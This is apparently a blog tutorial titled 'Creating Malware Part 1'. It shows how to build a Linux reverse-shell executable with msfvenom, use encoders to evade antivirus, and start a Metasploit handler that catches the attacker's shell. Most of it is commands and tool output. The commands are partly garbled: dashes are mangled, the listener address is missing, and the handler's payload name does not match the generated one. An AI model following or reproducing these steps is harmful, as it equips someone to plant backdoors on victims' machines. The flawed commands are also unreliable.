Creating Malware Part 1

Creating Malware Part 1
Spread the love

Creating Malware Part 1


in this article i will show you how you Creating Malware document-based malware to function, the target needs to open the malware in a vulnerable application like Microsoft Word. However these applications are regularly patched, and an attacker may not be able to identify a vulnerable application.

A different approach is to bypass the vulnerable application, and provide the target with an application that, when launched, directly provides a shell for the attacker.

The Metasploit framework comes with tools to do exactly this, and one excellent tool is named msfvenom. Suppose that an attacker wants to generate a Linux executable that when run on a 64-bit target connects back to the attacker and provides a shell. Run the command

Creating Malware Part 1

root@kali:~/malware# msfvenom –platform linux –arch x86_64 –format elf –encoder generic/ none –payload linux/x64/shell_reverse_tcp LHOST= LPORT=443 > MalwareLinux64


This is a complex command, with a number of parts

• Msfvenom supports a number of common platforms, including linux, windows, android, bsd, and solaris. The user can also choose a platform from a range of languages, including java, python, php, and ruby.

• The architecture (–arch) variable depends on the platform. For platforms like Windows and Linux; choices include x86 and x86_64.

• The format determines the type of the final executable. The collection of allowable formats can be determined by running the command

root@kali:~/malware# msfvenom –help-formats

Executable formats

Transform formats

In this example, the format is elf, the native format for Linux executables.

Encoders are used to change the form of the executable without modifying its underlying function. In some cases this can help bypass antivirus solutions. The list of encoders can be found with the command

root@kali:~/malware# msfvenom –list encoders

The generic encoder in the example does nothing to the result. One commonly used encoder for binaries is x86/shikata_ga_nai, which gives a different result each time it is run. Encoders can be run multiple times; to specify five passes, use the flag –iterations 5.

Creating Malware Part 1

• The collection of available payloads can be found by running the command

root@kali:~/malware# msfvenom –list payloads

The payload selected in the example, linux/x64/shell_reverse_tcp is a typical Metasploit payload; it provides a 64-bit shell that calls back to the attacker via TCP. Details about the payload, including any required options can be found by running msfvenom with the –options flag.

root@kali:~/malware# msfvenom –platform linux –arch x86_64 –format elf –encoder generic/none –payload linux/x64/shell_reverse_tcp –options Options for payload/linux/x64/shell_reverse_tcp

Name: Linux Command Shell, Reverse TCP Inline

Module: payload/linux/x64/shell_reverse_tcp

Platform: Linux Arch: x86_64

Needs Admin: No

Total size: 243

Rank: Normal

Provided by: ricky


The needed options are specified in the msfvenom command immediately following the payload; in the example the listening host is and the listening port is 443.

• The output of the msfvenom command would normally be displayed to the screen. Since this example is meant to generate a binary executable, the result is instead piped to the file named MalwareLinux64.

Before the malicious executable is run on the target, an appropriate handler needs to be started by the attacker.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x64/shell/reverse_tcp

payload => linux/x64/shell/reverse_tcp msf exploit(handler) > set lhost lhost =>

msf exploit(handler) > set lport 443

lport => 443

msf exploit(handler) > set exitonsession false

exitonsession => false msf exploit(handler) > exploit -j

[*] Exploit running as background job.

[*] Started reverse handler on

msf exploit(handler) > [*] Starting the payload handler…



Hacking Software

Introduction to Hunting Bugs


I'm a Computer Engineer Information Technology fields, specially in Info-sec field. Also, i'm freelance instructor in Ethical Hacking, Secure Web Development, Penetration Testing and Security Awareness. I have the following certificates : CEH, CHFI, ECSA, LPT Master, & ISO 27001 LI.

Leave a Reply

Your email address will not be published. Required fields are marked *

3 × 4 =